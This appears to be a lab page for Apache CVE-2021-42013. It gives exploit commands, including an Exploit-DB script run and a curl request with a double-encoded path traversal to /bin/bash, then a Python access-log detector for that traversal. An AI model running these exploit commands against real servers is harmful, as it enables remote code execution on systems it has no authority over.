CVE Labs

Apache 2.4.49/2.4.50 CVE-2021-42013

A Docker demo using Apache 2.4.50. Alternatively, use Apache 2.4.49/2.4.50 with cgi-bin enabled and an alias (e.g. for the "icons" directory) with a Require directive.

Payloads

Find the exploit with searchsploit 50512, then run it:

    python3 $(locate 50512.py) 192.168.56.1 6087

or with curl:

    curl --data "echo; {{payload}}" --path-as-is http://172.17.0.2/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash
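
Detection side of the curl request above, as an added example that is not part of the original lab: a Python check that percent-decodes each logged request path until it stops changing, showing that .%%32%65 becomes .%2e and then .. and flagging requests that resolve to a parent-directory segment. The log lines, the function names and MAX_ROUNDS are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Common Log Format (not captured traffic).
# Line 2 carries the double-encoded path from the curl command above.
SAMPLE_LOG = [
    '172.17.0.1 - - [01/Jan/2022:10:00:00 +0000] "GET /icons/apache_pb.gif HTTP/1.1" 200 4463',
    '172.17.0.1 - - [01/Jan/2022:10:00:05 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash HTTP/1.1" 200 45',
    '172.17.0.1 - - [01/Jan/2022:10:00:09 +0000] "GET /cgi-bin/.%2e/.%2e/etc/passwd HTTP/1.1" 400 226',
    '172.17.0.1 - - [01/Jan/2022:10:00:12 +0000] "GET /search?q=100%25%20off HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
MAX_ROUNDS = 5  # upper bound on decode passes so crafted input cannot loop for long


def decode_rounds(path):
    """Percent-decode until the string stops changing; return (decoded, passes)."""
    rounds = 0
    for _ in range(MAX_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def classify(line):
    """Return a finding dict if the request path resolves to a '..' segment."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw = m.group("target").split("?", 1)[0]  # path only, query string ignored
    decoded, rounds = decode_rounds(raw)
    if ".." not in decoded.split("/"):
        return None
    return {"raw": raw, "decoded": decoded, "rounds": rounds,
            "double_encoded": rounds >= 2, "status": int(m.group("status"))}


def scan(lines):
    """Collect findings for every log line that decodes to a traversal."""
    return [f for f in map(classify, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with double_encoded set and a 200 status is the one to triage first, since it means the server answered the request instead of rejecting it.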